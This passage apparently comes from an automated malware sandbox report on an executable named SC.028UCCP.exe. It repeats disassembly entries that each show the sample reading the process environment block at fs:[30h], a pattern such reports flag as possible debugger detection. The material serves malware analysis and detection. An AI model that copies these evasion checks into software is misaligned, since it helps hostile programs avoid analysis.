          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E564F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8A4F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8A4F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E794FA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E714C9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E714C9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E714C9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E714C9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E714C9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E744D1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E744D1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E844A8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E524A2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E524A2 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EDD4A0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EDD4A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EDD4A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8E4BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E50485 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8648A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8648A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8648A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8B490 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8B490 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EDC490 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F0F478 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E58470 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E58470 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1A464 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60445 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60445 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60445 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60445 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60445 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60445 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ED0443 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5D454 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5D454 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5D454 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5D454 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5D454 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5D454 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8D450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8D450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7E45E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7E45E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7E45E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7E45E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7E45E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EDF42F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EDF42F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EDF42F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EDF42F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EDF42F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4B420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ED9429 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E87425 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E87425 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4640D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EE6400 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EE6400 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F0F409 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5B5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5B5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5B5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5B5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5B5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5B5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E815EF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8A5E7 mov ebx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8A5E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EDC5FC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ED05C6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8C5C6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E865D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ED85AA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E545B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E545B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECE588 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECE588 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8A580 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8A580 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E89580 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E89580 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F0F582 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E82594 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EDC592 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6C560 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6E547 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1A553 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E86540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E88540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5254C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F2B55F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F2B55F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8F523 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E81527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E53536 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E53536 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4753F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4753F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4753F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8C50D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8C50D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E52500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4B502 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EDC51D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E71514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E71514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E71514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E71514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E71514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E71514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF51B mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF51B mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E496E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E496E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5C6E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E556E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E556E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E556E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E766E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E766E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECC6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECC6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E506CF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EF86C2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1A6C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7D6D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F186A8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F186A8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECD69D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E58690 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F0F68C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EDC691 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ED166E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ED166E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ED166E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8666D mov esi, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8666D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8666D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E63660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E63660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E63660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E47662 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E47662 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E47662 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E50670 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92670 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92670 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E53640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6F640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6F640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6F640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8C640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8C640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4D64A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4D64A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8265C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8265C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8265C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E85654 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5965A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5965A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFD62C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFD62C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFD62C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E57623 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E55622 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E55622 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8C620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E50630 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8F63F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8F63F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E80630 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ED8633 mov esi, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ED8633 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ED8633 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EE3608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EE3608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EE3608 mov eax, dword ptr fs:[00000030h]
